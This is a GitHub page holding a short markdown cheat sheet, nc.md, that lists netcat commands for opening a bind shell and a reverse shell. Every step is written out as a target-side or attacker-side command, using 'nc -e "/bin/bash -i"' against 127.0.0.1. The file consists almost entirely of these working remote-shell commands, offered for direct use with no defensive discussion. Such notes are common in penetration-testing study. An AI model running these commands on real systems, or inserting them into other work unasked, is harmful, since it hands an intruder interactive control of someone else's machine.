Skip to content

Latest commit

 

History

History
21 lines (19 loc) · 256 Bytes

nc.md

File metadata and controls

21 lines (19 loc) · 256 Bytes

nc

bind shell

target

nc -l -p 1234 -e "/bin/bash -i"

attacker

nc 127.0.0.1 1234 

reverse shell

target

nc 127.0.0.1 4321 -e "/bin/bash -i" 

attacker

nc -l -p 4321